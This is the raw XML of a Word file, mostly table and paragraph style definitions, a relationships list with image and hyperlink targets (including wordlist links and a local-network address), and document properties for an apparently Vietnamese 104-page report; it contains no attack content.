  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style82">
    <w:name w:val="_Style 82"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style83">
    <w:name w:val="_Style 83"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style84">
    <w:name w:val="_Style 84"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style85">
    <w:name w:val="_Style 85"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style86">
    <w:name w:val="_Style 86"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style87">
    <w:name w:val="_Style 87"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style88">
    <w:name w:val="_Style 88"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style89">
    <w:name w:val="_Style 89"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style90">
    <w:name w:val="_Style 90"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style91">
    <w:name w:val="_Style 91"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style92">
    <w:name w:val="_Style 92"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style93">
    <w:name w:val="_Style 93"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style94">
    <w:name w:val="_Style 94"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style95">
    <w:name w:val="_Style 95"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style96">
    <w:name w:val="_Style 96"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style97">
    <w:name w:val="_Style 97"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style98">
    <w:name w:val="_Style 98"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style99">
    <w:name w:val="_Style 99"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style100">
    <w:name w:val="_Style 100"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style101">
    <w:name w:val="_Style 101"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="115" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="115" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style102">
    <w:name w:val="_Style 102"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style103">
    <w:name w:val="_Style 103"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style104">
    <w:name w:val="_Style 104"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style105">
    <w:name w:val="_Style 105"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style106">
    <w:name w:val="_Style 106"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="15" w:type="dxa"/>
        <w:left w:w="15" w:type="dxa"/>
        <w:bottom w:w="15" w:type="dxa"/>
        <w:right w:w="15" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style107">
    <w:name w:val="_Style 107"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style108">
    <w:name w:val="_Style 108"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style109">
    <w:name w:val="_Style 109"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style110">
    <w:name w:val="_Style 110"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style111">
    <w:name w:val="_Style 111"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style112">
    <w:name w:val="_Style 112"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style113">
    <w:name w:val="_Style 113"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style114">
    <w:name w:val="_Style 114"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style115">
    <w:name w:val="_Style 115"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style116">
    <w:name w:val="_Style 116"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style117">
    <w:name w:val="_Style 117"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style118">
    <w:name w:val="_Style 118"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style119">
    <w:name w:val="_Style 119"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style120">
    <w:name w:val="_Style 120"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style121">
    <w:name w:val="_Style 121"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style122">
    <w:name w:val="_Style 122"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-V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qFormat/>
    <w:rPr>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>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qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="VerbatimChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:spacing w:after="100" w:line="269" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="17"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100" w:line="269" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B0471D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001030E8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001030E8"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001030E8"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001030E8"/>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AC2AC8"/>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C2AC8"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://rockyou.txt.gz" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId38"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webSettings" Target="webSettings.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item2.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/th4nhh4i/ServerC-Hai" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.174.162:8000" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/kkrypt0nn/wordlists.g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GBLGr3mB5JklysqMfh+kjGvgOw==">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3BBCDE8-6E69-4A9D-929E-7B37605ED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1473</TotalTime>
  <Pages>104</Pages>
  <Words>9049</Words>
  <Characters>51583</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>429</Lines>
  <Paragraphs>121</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>60511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Nhat</dc:creator>
  <cp:lastModifiedBy>THANH HAI</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-16T08:45:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-22T09:39:00Z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eyJoZGlkIjoiZDk3NTBlOGQ2MjI3M2ExZjJmNjE2ZWJjNzBiZWQ2N2YiLCJ1c2VySWQiOiIxMzkyMDA2MDM3OTk5In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.26880</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>E548BB852D09450C841026502CD5518F_12</vt:lpwstr>
  </property>
</Properties>
</file>